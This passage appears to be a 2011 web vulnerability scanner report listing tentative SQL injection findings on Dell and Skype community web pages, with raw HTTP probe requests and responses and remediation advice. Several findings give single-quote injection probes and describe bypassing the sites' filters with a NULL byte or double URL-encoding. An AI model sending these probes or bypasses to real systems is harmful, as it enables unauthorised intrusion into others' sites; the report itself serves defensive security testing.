P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:42 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell n
...[SNIP]...
ng, handling and other fees apply. U.S. Dell Small Business new purchases only. LIMIT 5 DISCOUNTED OR PROMOTIONAL ITEMS PER CUSTOMER. Dell reserves right to cancel orders arising from pricing or other errors.</div>
...[SNIP]...

Request 2

GET /sna/productdetail.aspx?sku= HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 23596
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:43 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell n
...[SNIP]...

1.2. http://accessories.us.dell.com/sna/productdetail.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://accessories.us.dell.com
Path:   /sna/productdetail.aspx

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /sna/productdetail.aspx?sku=&1%00'=1 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 25481
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:30:36 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell n
...[SNIP]...
ng, handling and other fees apply. U.S. Dell Small Business new purchases only. LIMIT 5 DISCOUNTED OR PROMOTIONAL ITEMS PER CUSTOMER. Dell reserves right to cancel orders arising from pricing or other errors.</div>
...[SNIP]...

Request 2

GET /sna/productdetail.aspx?sku=&1%00''=1 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 23870
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:30:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell n
...[SNIP]...

1.3. http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Android'/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 244364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/Android''/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:42 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.4. http://community.skype.com/t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 85262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.5. http://community.skype.com/t5/English/ct-p/English [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/English/ct-p/English

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/English/ct-p/English?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/English/ct-p/English?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 173560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.6. http://community.skype.com/t5/Pagamenti-Fatture-Crediti/bd-p/it_payment [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Pagamenti-Fatture-Crediti/bd-p/it_payment?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 176531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.7. http://community.skype.com/t5/Skype-Manager/bd-p/Skype_Manager [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Skype-Manager/bd-p/Skype_Manager

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Skype-Manager/bd-p/Skype_Manager?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:38 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Skype-Manager/bd-p/Skype_Manager?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:38 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 193464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.8. http://community.skype.com/t5/Skype-for-Business/bd-p/pt_business [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Skype-for-Business/bd-p/pt_business

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Skype-for-Business/bd-p'/pt_business HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Skype-for-Business/bd-p''/pt_business HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:45:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...

1.9. http://community.skype.com/t5/Skype-on-your-TV/bd-p/Skype_on_your_TV [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Skype-on-your-TV/bd-p/Skype_on_your_TV HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 162175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.10. http://community.skype.com/t5/Support-et-information/bd-p/fr_community [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Support-et-information/bd-p/fr_community

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Support-et-information/bd-p%2527/fr_community HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Support-et-information/bd-p%2527%2527/fr_community HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:47:25 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Page Not Fou
...[SNIP]...

1.11. http://community.skype.com/t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 85021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/Video/Screen-sharing-is-quot-grayed-out-quot/m-p/134058?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:37 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.12. http://community.skype.com/t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
